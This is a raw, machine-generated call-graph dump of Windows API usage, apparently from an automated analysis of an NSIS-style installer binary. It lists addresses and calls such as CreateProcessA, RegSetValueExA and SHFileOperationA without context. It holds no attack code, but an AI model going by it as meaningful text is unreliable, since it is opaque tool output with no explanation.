40140b 2 API calls 3473->3476 3479 40140b 2 API calls 3474->3479 3474->3481 3475->3472 3476->3481 3480 40140b 2 API calls 3477->3480 3478->3477 3479->3481 3482 4039d9 3480->3482 3481->3326 3482->3481 3483->3313 3484->3358 3485->3365 3487 406087 5 API calls 3486->3487 3488 4034ad lstrcatA 3487->3488 3488->3349 3488->3350 3490 4034ef 3489->3490 3491 4054fa GetLastError 3489->3491 3490->3367 3491->3490 3492 405509 SetFileSecurityA 3491->3492 3492->3490 3493 40551f GetLastError 3492->3493 3493->3490 3495 405536 3494->3495 3496 40553a GetLastError 3494->3496 3495->3367 3496->3495 3497->3368 3498->3381 3500 401389 2 API calls 3499->3500 3501 401420 3500->3501 3501->3330 3502->3398 3503->3400 3504->3404 3505->3422 3506->3414 3508 403a2b 3507->3508 3525 405c59 wsprintfA 3508->3525 3510 403a9c 3511 405d1d 18 API calls 3510->3511 3512 403aa8 SetWindowTextA 3511->3512 3513 403ac4 3512->3513 3514 4037c9 3512->3514 3513->3514 3515 405d1d 18 API calls 3513->3515 3514->3439 3515->3513 3516->3435 3517->3441 3526 404003 3518->3526 3520 4050dc 3524 405103 3520->3524 3529 401389 3520->3529 3521 404003 SendMessageA 3522 405115 OleUninitialize 3521->3522 3522->3471 3524->3521 3525->3510 3527 40401b 3526->3527 3528 40400c SendMessageA 3526->3528 3527->3520 3528->3527 3531 401390 3529->3531 3530 4013fe 3530->3520 3531->3530 3532 4013cb MulDiv SendMessageA 3531->3532 3532->3531 3613 402b51 3614 402b60 SetTimer 3613->3614 3615 402b79 3613->3615 3614->3615 3616 402bc7 3615->3616 3617 402bcd MulDiv 3615->3617 3618 402b87 wsprintfA SetWindowTextA SetDlgItemTextA 3617->3618 3618->3616 3627 402654 3628 402a0c 18 API calls 3627->3628 3629 40265b FindFirstFileA 3628->3629 3630 40267e 3629->3630 3633 40266e 3629->3633 3635 405c59 wsprintfA 3630->3635 3632 402685 3636 405cfb lstrcpynA 3632->3636 3635->3632 3636->3633 3637 4024d4 3638 4024d9 3637->3638 3639 4024ea 3637->3639 3646 4029ef 3638->3646 3640 402a0c 18 API calls 3639->3640 3642 4024f1 lstrlenA 3640->3642 3644 4024e0 3642->3644 3643 402672 3644->3643 3645 402510 WriteFile 3644->3645 3645->3643 3647 405d1d 18 API calls 3646->3647 3648 402a03 3647->3648 3648->3644 3649 4014d6 3650 4029ef 18 API calls 3649->3650 3651 4014dc Sleep 3650->3651 3653 4028a1 3651->3653 3659 4018d8 3660 40190f 3659->3660 3661 402a0c 18 API calls 3660->3661 3662 401914 3661->3662 3663 405620 70 API calls 3662->3663 3664 40191d 3663->3664 3665 4018db 3666 402a0c 18 API calls 3665->3666 3667 4018e2 3666->3667 3668 4055bc MessageBoxIndirectA 3667->3668 3669 4018eb 3668->3669 3166 40365c 3167 403677 3166->3167 3168 40366d CloseHandle 3166->3168 3169 403681 CloseHandle 3167->3169 3170 40368b 3167->3170 3168->3167 3169->3170 3175 4036b9 3170->3175 3176 4036c7 3175->3176 3177 403690 3176->3177 3178 4036cc FreeLibrary GlobalFree 3176->3178 3179 405620 3177->3179 3178->3177 3178->3178 3221 4058cf 3179->3221 3182 405654 3195 405789 3182->3195 3235 405cfb lstrcpynA 3182->3235 3183 40563d DeleteFileA 3184 40369c 3183->3184 3186 40567e 3187 405682 lstrcatA 3186->3187 3188 40568f 3186->3188 3190 405695 3187->3190 3236 405835 lstrlenA 3188->3236 3189 405ff6 2 API calls 3192 4057ae 3189->3192 3193 4056a3 lstrcatA 3190->3193 3194 4056ae lstrlenA FindFirstFileA 3190->3194 3192->3184 3196 4057ee 3 API calls 3192->3196 3193->3194 3194->3195 3200 4056d2 3194->3200 3195->3184 3195->3189 3198 4057b8 3196->3198 3197 405819 CharNextA 3197->3200 3199 4059b3 2 API calls 3198->3199 3201 4057be RemoveDirectoryA 3199->3201 3200->3197 3205 405768 FindNextFileA 3200->3205 3210 40572f 3200->3210 3216 405620 61 API calls 3200->3216 3240 405cfb lstrcpynA 3200->3240 3202 4057e0 3201->3202 3203 4057c9 3201->3203 3204 404fe7 25 API calls 3202->3204 3203->3184 3207 4057cf 3203->3207 3204->3184 3205->3200 3208 405780 FindClose 3205->3208 3209 404fe7 25 API calls 3207->3209 3208->3195 3211 4057d7 3209->3211 3213 4059b3 2 API calls 3210->3213 3212 405a49 40 API calls 3211->3212 3214 4057de 3212->3214 3215 405735 DeleteFileA 3213->3215 3214->3184 3220 405740 3215->3220 3216->3200 3217 404fe7 25 API calls 3217->3205 3218 404fe7 25 API calls 3218->3220 3220->3205 3220->3217 3220->3218 3241 405a49 3220->3241 3267 405cfb lstrcpynA 3221->3267 3223 4058e0 3224 405882 4 API calls 3223->3224 3225 4058e6 3224->3225 3226 405634 3225->3226 3227 405f5d 5 API calls 3225->3227 3226->3182 3226->3183 3233 4058f6 3227->3233 3228 405921 lstrlenA 3229 40592c 3228->3229 3228->3233 3230 4057ee 3 API calls 3229->3230 3232 405931 GetFileAttributesA 3230->3232 3231 405ff6 2 API calls 3231->3233 3232->3226 3233->3226 3233->3228 3233->3231 3234 405835 2 API calls 3233->3234 3234->3228 3235->3186 3237 405842 3236->3237 3238 405853 3237->3238 3239 405847 CharPrevA 3237->3239 3238->3190 3239->3237 3239->3238 3240->3200 3268 406087 GetModuleHandleA 3241->3268 3244 405ab1 GetShortPathNameA 3246 405ac6 3244->3246 3247 405ba6 3244->3247 3246->3247 3249 405ace wsprintfA 3246->3249 3247->3220 3248 405a95 CloseHandle GetShortPathNameA 3248->3247 3250 405aa9 3248->3250 3251 405d1d 18 API calls 3249->3251 3250->3244 3250->3247 3252 405af6 3251->3252 3275 4059d2 GetFileAttributesA CreateFileA 3252->3275 3254 405b03 3254->3247 3255 405b12 GetFileSize GlobalAlloc 3254->3255 3256 405b30 ReadFile 3255->3256 3257 405b9f CloseHandle 3255->3257 3256->3257 3258 405b44 3256->3258 3257->3247 3258->3257 3276 405947 lstrlenA 3258->3276 3261 405bb3 3263 405947 4 API calls 3261->3263 3262 405b59 3281 405cfb lstrcpynA 3262->3281 3265 405b67 3263->3265 3266 405b7a SetFilePointer WriteFile GlobalFree 3265->3266 3266->3257 3267->3223 3269 4060a3 3268->3269 3270 4060ad GetProcAddress 3268->3270 3282 40601d GetSystemDirectoryA 3269->3282 3273 405a54 3270->3273 3272 4060a9 3272->3270 3272->3273 3273->3244 3273->3247 3274 4059d2 GetFileAttributesA CreateFileA 3273->3274 3274->3248 3275->3254 3277 40597d lstrlenA 3276->3277 3278 40595b lstrcmpiA 3277->3278 3280 405987 3277->3280 3279 405974 CharNextA 3278->3279 3278->3280 3279->3277 3280->3261 3280->3262 3281->3265 3283 40603f wsprintfA LoadLibraryA 3282->3283 3283->3272 3670 4025e2 3671 4025e9 3670->3671 3673 40284e 3670->3673 3672 4029ef 18 API calls 3671->3672 3674 4025f4 3672->3674 3675 4025fb SetFilePointer 3674->3675 3675->3673 3676 40260b 3675->3676 3678 405c59 wsprintfA 3676->3678 3678->3673 3679 403ae4 3680 403c37 3679->3680 3681 403afc 3679->3681 3682 403c88 3680->3682 3683 403c48 GetDlgItem GetDlgItem 3680->3683 3681->3680 3684 403b08 3681->3684 3688 403ce2 3682->3688 3696 401389 2 API calls 3682->3696 3764 403fb7 3683->3764 3685 403b13 SetWindowPos 3684->3685 3686 403b26 3684->3686 3685->3686 3689 403b43 3686->3689 3690 403b2b ShowWindow 3686->3690 3692 404003 SendMessageA 3688->3692 3738 403c32 3688->3738 3693 403b65 3689->3693 3694 403b4b DestroyWindow 3689->3694 3690->3689 3691 403c72 SetClassLongA 3695 40140b 2 API calls 3691->3695 3736 403cf4 3692->3736 3697 403b6a SetWindowLongA 3693->3697 3698 403b7b 3693->3698 3746 403f40 3694->3746 3695->3682 3699 403cba 3696->3699 3697->3738 3702 403b87 GetDlgItem 3698->3702 3715 403bf2 3698->3715 3699->3688 3703 403cbe SendMessageA 3699->3703 3700 40140b 2 API calls 3700->3736 3701 403f42 DestroyWindow EndDialog 3701->3746 3705 403b9a SendMessageA IsWindowEnabled 3702->3705 3708 403bb7 3702->3708 3703->3738 3704 403f71 ShowWindow 3704->3738 3705->3708 3705->3738 3707 405d1d 18 API calls 3707->3736 3709 403bc4 3708->3709 3710 403bd7 3708->3710 3711 403c0b SendMessageA 3708->3711 3719 403bbc 3708->3719 3709->3711 3709->3719 3713 403bf4 3710->3713 3714 403bdf 3710->3714 3711->3715 3717 40140b 2 API calls 3713->3717 3716 40140b 2 API calls 3714->3716 3750 40401e 3715->3750 3716->3719 3717->3719 3718 403fb7 19 API calls 3718->3736 3719->3715 3747 403f90 3719->3747 3720 403fb7 19 API calls 3721 403d6f GetDlgItem 3720->3721 3722 403d84 3721->3722 3723 403d8c ShowWindow EnableWindow 3721->3723 3722->3723 3767 403fd9 EnableWindow 3723->3767 3725 403db6 EnableWindow 3728 403dca 3725->3728 3726 403dcf GetSystemMenu EnableMenuItem SendMessageA 3727 403dff SendMessageA 3726->3727 3726->3728 3727->3728 3728->3726 3768 403fec SendMessageA 3728->3768 3769 405cfb lstrcpynA 3728->3769 3731 403e2d lstrlenA 3732 405d1d 18 API calls 3731->3732 3733 403e3e SetWindowTextA 3732->3733 3734 401389 2 API calls 3733->3734 3734->3736 3735 403e82 DestroyWindow 3737 403e9c CreateDialogParamA 3735->3737 3735->3746 3736->3700 3736->3701 3736->3707 3736->3718 3736->3720 3736->3735 3736->3738 3739 403ecf 3737->3739 3737->3746 3740 403fb7 19 API calls 3739->3740 3741 403eda GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3740->3741 3742 401389 2 API calls 3741->3742 3743 403f20 3742->3743 3743->3738 3744 403f28 ShowWindow 3743->3744 3745 404003 SendMessageA 3744->3745 3745->3746 3746->3704 3746->3738 3748 403f97 3747->3748 3749 403f9d SendMessageA 3747->3749 3748->3749 3749->3715 3751 4040bf 3750->3751 3752 404036 GetWindowLongA 3750->3752 3751->3738 3752->3751 3753 404047 3752->3753 3754 404056 GetSysColor 3753->3754 3755 404059 3753->3755 3754->3755 3756 404069 SetBkMode 3755->3756 3757 40405f SetTextColor 3755->3757 3758 404081 GetSysColor 3756->3758 3759 404087 3756->3759 3757->3756 3758->3759 3760 404098 3759->3760 3761 40408e SetBkColor 3759->3761 3760->3751 3762 4040b2 CreateBrushIndirect 3760->3762 3763 4040ab DeleteObject 3760->3763 3761->3760 3762->3751 3763->3762 3765 405d1d 18 API calls 3764->3765 3766 403fc2 SetDlgItemTextA 3765->3766 3766->3691 3767->3725 3768->3728 3769->3731 3770 401ae5 3771 402a0c 18 API calls 3770->3771 3772 401aec 3771->3772 3773 4029ef 18 API calls 3772->3773 3774 401af5 wsprintfA 3773->3774 3775 4028a1 3774->3775 3776 4019e6 3777 402a0c 18 API calls 3776->3777 3778 4019ef ExpandEnvironmentStringsA 3777->3778 3779 401a03 3778->3779 3781 401a16 3778->3781 3780 401a08 lstrcmpA 3779->3780 3779->3781 3780->3781 3782 401f67 3783 401f79 3782->3783 3792 402028 3782->3792 3784 402a0c 18 API calls 3783->3784 3785 401f80 3784->3785 3787 402a0c 18 API calls 3785->3787 3786 401423 25 API calls 3793 40217f 3786->3793 3788 401f89 3787->3788 3789 401f91 GetModuleHandleA 3788->3789 3790 401f9e LoadLibraryExA 3788->3790 3789->3790 3791 401fae GetProcAddress 3789->3791 3790->3791 3790->3792 3794 401ffb 3791->3794 3795 401fbe 3791->3795 3792->3786 3796 404fe7 25 API calls 3794->3796 3797 401423 25 API calls 3795->3797 3798 401fce 3795->3798 3796->3798 3797->3798 3798->3793 3799 40201c FreeLibrary 3798->3799 3799->3793 3814 401c6d 3815 4029ef 18 API calls 3814->3815 3816 401c73 IsWindow 3815->3816 3817 4019d6 3816->3817 3818 4014f0 SetForegroundWindow 3819 4028a1 3818->3819 3827 4043f5 3828 404421 3827->3828 3829 404432 3827->3829 3888 4055a0 GetDlgItemTextA 3828->3888 3830 40443e GetDlgItem 3829->3830 3837 40449d 3829->3837 3832 404452 3830->3832 3836 404466 SetWindowTextA 3832->3836 3840 405882 4 API calls 3832->3840 3833 404581 3886 40472b 3833->3886 3890 4055a0 GetDlgItemTextA 3833->3890 3834 40442c 3835 405f5d 5 API calls 3834->3835 3835->3829 3841 403fb7 19 API calls 3836->3841 3837->3833 3842 405d1d 18 API calls 3837->3842 3837->3886 3839 40401e 8 API calls 3844 40473f 3839->3844 3845 40445c 3840->3845 3846 404482 3841->3846 3847 404511 SHBrowseForFolderA 3842->3847 3843 4045b1 3848 4058cf 18 API calls 3843->3848 3845->3836 3852 4057ee 3 API calls 3845->3852 3849 403fb7 19 API calls 3846->3849 3847->3833 3850 404529 CoTaskMemFree 3847->3850 3851 4045b7 3848->3851 3853 404490 3849->3853 3854 4057ee 3 API calls 3850->3854 3891 405cfb lstrcpynA 3851->3891 3852->3836 3889 403fec SendMessageA 3853->3889 3857 404536 3854->3857 3859 40456d SetDlgItemTextA 3857->3859 3863 405d1d 18 API calls 3857->3863 3858 404496 3861 406087 5 API calls 3858->3861 3859->3833 3860 4045ce 3862 406087 5 API calls 3860->3862 3861->3837 3864 4045d5 3862->3864 3865 404555 lstrcmpiA 3863->3865 3866 404611 3864->3866 3874 405835 2 API calls 3864->3874 3875 404669 3864->3875 3865->3859 3867 404566 lstrcatA 3865->3867 3892 405cfb lstrcpynA 3866->3892 3867->3859 3869 404618 3870 405882 4 API calls 3869->3870 3871 40461e GetDiskFreeSpaceA 3870->3871 3873 404642 MulDiv 3871->3873 3871->3875 3873->3875 3874->3864 3876 4046da 3875->3876 3893 404871 3875->3893 3878 4046fd 3876->3878 3880 40140b 2 API calls 3876->3880 3904 403fd9 EnableWindow 3878->3904 3880->3878 3881 4046dc SetDlgItemTextA 3881->3876 3882 4046cc 3896 4047ac 3882->3896 3885 404719 3885->3886 3905 40438a 3885->3905 3886->3839 3888->3834 3889->3858 3890->3843 3891->3860 3892->3869 3894 4047ac 21 API calls 3893->3894 3895 4046c7 3894->3895 3895->3881 3895->3882 3897 4047c2 3896->3897 3898 405d1d 18 API calls 3897->3898 3899 404826 3898->3899 3900 405d1d 18 API calls 3899->3900 3901 404831 3900->3901 3902 405d1d 18 API calls 3901->3902 3903 404847 lstrlenA wsprintfA SetDlgItemTextA 3902->3903 3903->3876 3904->3885 3906 404398 3905->3906 3907 40439d SendMessageA 3905->3907 3906->3907 3907->3886 3908 4016fa 3909 402a0c 18 API calls 3908->3909 3910 401701 SearchPathA 3909->3910 3911 40171c 3910->3911 3913 4027cc 3910->3913 3911->3913 3914 405cfb lstrcpynA 3911->3914 3914->3913 3915 40287c SendMessageA 3916 4028a1 3915->3916 3917 402896 InvalidateRect 3915->3917 3917->3916 3918 40227d 3919 402a0c 18 API calls 3918->3919 3920 40228b 3919->3920 3921 402a0c 18 API calls 3920->3921 3922 402294 3921->3922 3923 402a0c 18 API calls 3922->3923 3924 40229e GetPrivateProfileStringA 3923->3924 3925 4014fe 3926 401506 3925->3926 3928 401519 3925->3928 3927 4029ef 18 API calls 3926->3927 3927->3928 3936 4040ff 3937 404115 3936->3937 3942 404222 3936->3942 3939 403fb7 19 API calls 3937->3939 3938 404291 3940 404365 3938->3940 3941 40429b GetDlgItem 3938->3941 3943 40416b 3939->3943 3946 40401e 8 API calls 3940->3946 3947 4042b1 3941->3947 3948 404323 3941->3948 3942->3938 3942->3940 3944 404266 GetDlgItem SendMessageA 3942->3944 3945 403fb7 19 API calls 3943->3945 3967 403fd9 EnableWindow 3944->3967 3950 404178 CheckDlgButton 3945->3950 3951 404360 3946->3951 3947->3948 3952 4042d7 6 API calls 3947->3952 3948->3940 3953 404335 3948->3953 3965 403fd9 EnableWindow 3950->3965 3952->3948 3956 40433b SendMessageA 3953->3956 3957 40434c 3953->3957 3954 40428c 3958 40438a SendMessageA 3954->3958 3956->3957 3957->3951 3960 404352 SendMessageA 3957->3960 3958->3938 3959 404196 GetDlgItem 3966 403fec SendMessageA 3959->3966 3960->3951 3962 4041ac SendMessageA 3963 4041d3 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 3962->3963 3964 4041ca GetSysColor 3962->3964 3963->3951 3964->3963 3965->3959 3966->3962 3967->3954 3968 401000 3969 401037 BeginPaint GetClientRect 3968->3969 3971 40100c DefWindowProcA 3968->3971 3972 4010f3 3969->3972 3973 401179 3971->3973 3974 401073 CreateBrushIndirect FillRect DeleteObject 3972->3974 3975 4010fc 3972->3975 3974->3972 3976 401102 CreateFontIndirectA 3975->3976 3977 401167 EndPaint 3975->3977 3976->3977 3978 401112 6 API calls 3976->3978 3977->3973 3978->3977 3979 402188 3980 402a0c 18 API calls 3979->3980 3981 40218e 3980->3981 3982 402a0c 18 API calls 3981->3982 3983 402197 3982->3983 3984 402a0c 18 API calls 3983->3984 3985 4021a0 3984->3985 3986 405ff6 2 API calls 3985->3986 3987 4021a9 3986->3987 3988 4021ba lstrlenA lstrlenA 3987->3988 3989 4021ad 3987->3989 3991 404fe7 25 API calls 3988->3991 3990 404fe7 25 API calls 3989->3990 3993 4021b5 3989->3993 3990->3993 3992 4021f6 SHFileOperationA 3991->3992 3992->3989 3992->3993 3142 401389 3144 401390 3142->3144 3143 4013fe 3144->3143 3145 4013cb MulDiv SendMessageA 3144->3145 3145->3144 3994 40220a 3995 402211 3994->3995 3998 402224 3994->3998 3996 405d1d 18 API calls 3995->3996 3997 40221e 3996->3997 3999 4055bc MessageBoxIndirectA 3997->3999 3999->3998 4000 401c8a 4001 4029ef 18 API calls 4000->4001 4002 401c91 4001->4002 4003 4029ef 18 API calls 4002->4003 4004 401c99 GetDlgItem 4003->4004 4005 4024ce 4004->4005 4006 40370c 4007 403717 4006->4007 4008 40371e GlobalAlloc 4007->4008 4009 40371b 4007->4009 4008->4009 4010 401490 4011 404fe7 25 API calls 4010->4011 4012 401497 4011->4012 4013 402611 4014 402618 4013->4014 4016 4028a1 4013->4016 4015 40261e FindClose 4014->4015 4015->4016 4017 402692 4018 402a0c 18 API calls 4017->4018 4020 4026a0 4018->4020 4019 4026b6 4022 4059b3 2 API calls 4019->4022 4020->4019 4021 402a0c 18 API calls 4020->4021 4021->4019 4023 4026bc 4022->4023 4043 4059d2 GetFileAttributesA CreateFileA 4023->4043 4025 4026c9 4026 402772 4025->4026 4027 4026d5 GlobalAlloc 4025->4027 4030 40277a DeleteFileA 4026->4030 4031 40278d 4026->4031 4028 402769 CloseHandle 4027->4028 4029 4026ee 4027->4029 4028->4026 4044 403207 SetFilePointer 4029->4044 4030->4031 4033 4026f4 4034 4031d5 ReadFile 4033->4034 4035 4026fd GlobalAlloc 4034->4035 4036 402741 WriteFile GlobalFree 4035->4036 4037 40270d 4035->4037 4039 402f2e 48 API calls 4036->4039 4038 402f2e 48 API calls 4037->4038 4042 40271a 4038->4042 4040 402766 4039->4040 4040->4028 4041 402738 GlobalFree 4041->4036 4042->4041 4043->4025 4044->4033 4045 401595 4046 402a0c 18 API calls 4045->4046 4047 40159c SetFileAttributesA 4046->4047 4048 4015ae 4047->4048 4049 401e95 4050 402a0c 18 API calls 4049->4050 4051 401e9c 4050->4051 4052 405ff6 2 API calls 4051->4052 4053 401ea2 4052->4053 4055 401eb4 4053->4055 4056 405c59 wsprintfA 4053->4056 4056->4055 4057 401696 4058 402a0c 18 API calls 4057->4058 4059 40169c GetFullPathNameA 4058->4059 4060 4016b3 4059->4060 4066 4016d4 4059->4066 4063 405ff6 2 API calls 4060->4063 4060->4066 4061 4028a1 4062 4016e8 GetShortPathNameA 4062->4061 4064 4016c4 4063->4064 4064->4066 4067 405cfb lstrcpynA 4064->4067 4066->4061 4066->4062 4067->4066 4075 402319 4076 40231f 4075->4076 4077 402a0c 18 API calls 4076->4077 4078 402331 4077->4078 4079 402a0c 18 API calls 4078->4079 4080 40233b RegCreateKeyExA 4079->4080 4081 4028a1 4080->4081 4082 402365 4080->4082 4083 40237d 4082->4083 4084 402a0c 18 API calls 4082->4084 4085 402389 4083->4085 4087 4029ef 18 API calls 4083->4087 4086 402376 lstrlenA 4084->4086 4088 4023a4 RegSetValueExA 4085->4088 4089 402f2e 48 API calls 4085->4089 4086->4083 4087->4085 4090 4023ba RegCloseKey 4088->4090 4089->4088 4090->4081 4092 402819 4093 4029ef 18 API calls 4092->4093 4094 40281f 4093->4094 4095 402672 4094->4095 4096 402850 4094->4096 4097 40282d 4094->4097 4096->4095 4098 405d1d 18 API calls 4096->4098 4097->4095 4100 405c59 wsprintfA 4097->4100 4098->4095 4100->4095 3146 401e1b 3147 402a0c 18 API calls 3146->3147 3148 401e21 3147->3148 3149 404fe7 25 API calls 3148->3149 3150 401e2b 3149->3150 3162 40555b CreateProcessA 3150->3162 3152 402672 3153 401e87 CloseHandle 3153->3152 3154 401e50 WaitForSingleObject 3155 401e31 3154->3155 3156 401e5e GetExitCodeProcess 3154->3156 3155->3152 3155->3153 3155->3154 3159 4060c3 2 API calls 3155->3159 3157 401e70 3156->3157 3158 401e7b 3156->3158 3165 405c59 wsprintfA 3157->3165 3158->3153 3161 401e79 3158->3161 3159->3154 3161->3153 3163 405596 3162->3163 3164 40558a CloseHandle 3162->3164 3163->3155 3164->3163 3165->3161 4101 401d1b GetDC GetDeviceCaps 4102 4029ef 18 API calls 4101->4102 4103 401d37 MulDiv 4102->4103 4104 4029ef 18 API calls 4103->4104 4105 401d4c 4104->4105 4106 405d1d 18 API calls 4105->4106 4107 401d85 CreateFontIndirectA 4106->4107 4108 4024ce 4107->4108 4108->4108 4109 40251c 4110 4029ef 18 API calls 4109->4110 4111 402526 4110->4111 4112 40255a ReadFile 4111->4112 4113 40259e 4111->4113 4115 4025ae 4111->4115 4117 40259c 4111->4117 4112->4111 4112->4117 4118 405c59 wsprintfA 4113->4118 4116 4025c4 SetFilePointer 4115->4116 4115->4117 4116->4117 4118->4117 2933 401721 2939 402a0c 2933->2939 2937 40172f 2938 405a01 2 API calls 2937->2938 2938->2937 2940 402a18 2939->2940 2949 405d1d 2940->2949 2943 401728 2945 405a01 2943->2945 2946 405a0c GetTickCount GetTempFileNameA 2945->2946 2947 405a3c 2946->2947 2948 405a38 2946->2948 2947->2937 2948->2946 2948->2947 2959 405d2a 2949->2959 2950 405f44 2951 402a39 2950->2951 2984 405cfb lstrcpynA 2950->2984 2951->2943 2968 405f5d 2951->2968 2953 405dc2 GetVersion 2954 405dcf 2953->2954 2954->2959 2961 405e3a GetSystemDirectoryA 2954->2961 2962 405e4d GetWindowsDirectoryA 2954->2962 2964 405d1d 10 API calls 2954->2964 2965 405ec4 lstrcatA 2954->2965 2966 405e81 SHGetSpecialFolderLocation 2954->2966 2977 405be2 RegOpenKeyExA 2954->2977 2955 405f1b lstrlenA 2955->2959 2958 405d1d 10 API calls 2958->2955 2959->2950 2959->2953 2959->2955 2959->2958 2963 405f5d 5 API calls 2959->2963 2982 405c59 wsprintfA 2959->2982 2983 405cfb lstrcpynA 2959->2983 2961->2954 2962->2954 2963->2959 2964->2954 2965->2959 2966->2954 2967 405e99 SHGetPathFromIDListA CoTaskMemFree 2966->2967 2967->2954 2974 405f69 2968->2974 2969 405fd1 2970 405fd5 CharPrevA 2969->2970 2973 405ff0 2969->2973 2970->2969 2971 405fc6 CharNextA 2971->2969 2971->2974 2973->2943 2974->2969 2974->2971 2975 405fb4 CharNextA 2974->2975 2976 405fc1 CharNextA 2974->2976 2985 405819 2974->2985 2975->2974 2976->2971 2978 405c53 2977->2978 2979 405c15 RegQueryValueExA 2977->2979 2978->2954 2980 405c36 RegCloseKey 2979->2980 2980->2978 2982->2959 2983->2959 2984->2951 2986 40581f 2985->2986 2987 405832 2986->2987 2988 405825 CharNextA 2986->2988 2987->2974 2988->2986 4119 401922 4120 402a0c 18 API calls 4119->4120 4121 401929 lstrlenA 4120->4121 4122 4024ce 4121->4122 4123 405125 4124 4052d1 4123->4124 4125 405146 GetDlgItem GetDlgItem GetDlgItem 4123->4125 4127 405302 4124->4127 4128 4052da GetDlgItem CreateThread CloseHandle 4124->4128 4169 403fec SendMessageA 4125->4169 4130 40532d 4127->4130 4131 405319 ShowWindow ShowWindow 4127->4131 4132 40534f 4127->4132 4128->4127 4129 4051b7 4135 4051be GetClientRect GetSystemMetrics SendMessageA SendMessageA 4129->4135 4133 40538b 4130->4133 4137 405364 ShowWindow 4130->4137 4138 40533e 4130->4138 4171 403fec SendMessageA 4131->4171 4134 40401e 8 API calls 4132->4134 4133->4132 4143 405396 SendMessageA 4133->4143 4149 40535d 4134->4149 4141 405211 SendMessageA SendMessageA 4135->4141 4142 40522d 4135->4142 4139 405384 4137->4139 4140 405376 4137->4140 4144 403f90 SendMessageA 4138->4144 4146 403f90 SendMessageA 4139->4146 4145 404fe7 25 API calls 4140->4145 4141->4142 4147 405240 4142->4147 4148 405232 SendMessageA 4142->4148 4143->4149 4150 4053af CreatePopupMenu 4143->4150 4144->4132 4145->4139 4146->4133 4152 403fb7 19 API calls 4147->4152 4148->4147 4151 405d1d 18 API calls 4150->4151 4153 4053bf AppendMenuA 4151->4153 4154 405250 4152->4154 4155 4053d2 GetWindowRect 4153->4155 4156 4053e5 4153->4156 4157 405259 ShowWindow 4154->4157 4158 40528d GetDlgItem SendMessageA 4154->4158 4159 4053ee TrackPopupMenu 4155->4159 4156->4159 4160 40527c 4157->4160 4161 40526f ShowWindow 4157->4161 4158->4149 4162 4052b4 SendMessageA SendMessageA 4158->4162 4159->4149 4163 40540c 4159->4163 4170 403fec SendMessageA 4160->4170 4161->4160 4162->4149 4164 405428 SendMessageA 4163->4164 4164->4164 4166 405445 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4164->4166 4167 405467 SendMessageA 4166->4167 4167->4167 4168 405488 GlobalUnlock SetClipboardData CloseClipboard 4167->4168 4168->4149 4169->4129 4170->4158 4171->4130 4172 401ca5 4173 4029ef 18 API calls 4172->4173 4174 401cb5 SetWindowLongA 4173->4174 4175 4028a1 4174->4175 4176 401a26 4177 4029ef 18 API calls 4176->4177 4178 401a2c 4177->4178 4179 4029ef 18 API calls 4178->4179 4180 4019d6 4179->4180 4181 406a26 4184 4061b7 4181->4184 4182 406241 GlobalAlloc 4182->4184 4185 406b22 4182->4185 4183 406238 GlobalFree 4183->4182 4184->4182 4184->4183 4184->4184 4184->4185 4186 4062b8 GlobalAlloc 4184->4186 4187 4062af GlobalFree 4184->4187 4186->4184 4186->4185 4187->4186 4188 40262b 4189 402646 4188->4189 4190 40262e 4188->4190 4191 4027cc 4189->4191 4194 405cfb lstrcpynA 4189->4194 4192 40263b FindNextFileA 4190->4192 4192->4189 4194->4191 4195 401bad 4196 4029ef 18 API calls 4195->4196 4197 401bb4 4196->4197 4198 4029ef 18 API calls 4197->4198 4199 401bbe 4198->4199 4200 401bce 4199->4200 4201 402a0c 18 API calls 4199->4201 4202 401bde 4200->4202 4203 402a0c 18 API calls 4200->4203 4201->4200 4204 401be9 4202->4204 4205 401c2d 4202->4205 4203->4202 4207 4029ef 18 API calls 4204->4207 4206 402a0c 18 API calls 4205->4206 4209 401c32 4206->4209 4208 401bee 4207->4208 4210 4029ef 18 API calls 4208->4210 4211 402a0c 18 API calls 4209->4211 4212 401bf7 4210->4212 4213 401c3b FindWindowExA 4211->4213 4214 401c1d SendMessageA 4212->4214 4215 401bff SendMessageTimeoutA 4212->4215 4216 401c59 4213->4216 4214->4216 4215->4216 4217 4043ae 4218 4043e4 4217->4218 4219 4043be 4217->4219 4221 40401e 8 API calls 4218->4221 4220 403fb7 19 API calls 4219->4220 4222 4043cb SetDlgItemTextA 4220->4222 4223 4043f0 4221->4223 4222->4218 4224 4024b2 4225 402a0c 18 API calls 4224->4225 4226 4024b9 4225->4226 4229 4059d2 GetFileAttributesA CreateFileA 4226->4229 4228 4024c5 4229->4228 2989 4015b3 2990 402a0c 18 API calls 2989->2990 2991 4015ba 2990->2991 3007 405882 CharNextA CharNextA 2991->3007 2993 4015c2 2994 40160a 2993->2994 2995 405819 CharNextA 2993->2995 2996 40162d 2994->2996 2997 40160f 2994->2997 2998 4015d0 CreateDirectoryA 2995->2998 3001 401423 25 API calls 2996->3001 3013 401423 2997->3013 2998->2993 3000 4015e5 GetLastError 2998->3000 3000->2993 3003 4015f2 GetFileAttributesA 3000->3003 3006 40217f 3001->3006 3003->2993 3005 401621 SetCurrentDirectoryA 3005->3006 3008 4058a8 3007->3008 3009 40589c 3007->3009 3011 405819 CharNextA 3008->3011 3012 4058c5 3008->3012 3009->3008 3010 4058a3 CharNextA 3009->3010 3010->3012 3011->3008 3012->2993 3017 404fe7 3013->3017 3016 405cfb lstrcpynA 3016->3005 3018 401431 3017->3018 3019 405002 3017->3019 3018->3016 3020 40501f lstrlenA 3019->3020 3021 405d1d 18 API calls 3019->3021 3022 405048 3020->3022 3023 40502d lstrlenA 3020->3023 3021->3020 3025 40505b 3022->3025 3026 40504e SetWindowTextA 3022->3026 3023->3018 3024 40503f lstrcatA 3023->3024 3024->3022 3025->3018 3027 405061 SendMessageA SendMessageA SendMessageA 3025->3027 3026->3025 3027->3018 4230 406333 4232 4061b7 4230->4232 4231 406b22 4232->4231 4233 406241 GlobalAlloc 4232->4233 4234 406238 GlobalFree 4232->4234 4235 4062b8 GlobalAlloc 4232->4235 4236 4062af GlobalFree 4232->4236 4233->4231 4233->4232 4234->4233 4235->4231 4235->4232 4236->4235 3028 401734 3029 402a0c 18 API calls 3028->3029 3030 40173b 3029->3030 3031 401761 3030->3031 3032 401759 3030->3032 3083 405cfb lstrcpynA 3031->3083 3082 405cfb lstrcpynA 3032->3082 3035 40175f 3039 405f5d 5 API calls 3035->3039 3036 40176c 3084 4057ee lstrlenA CharPrevA 3036->3084 3058 40177e 3039->3058 3043 401795 CompareFileTime 3043->3058 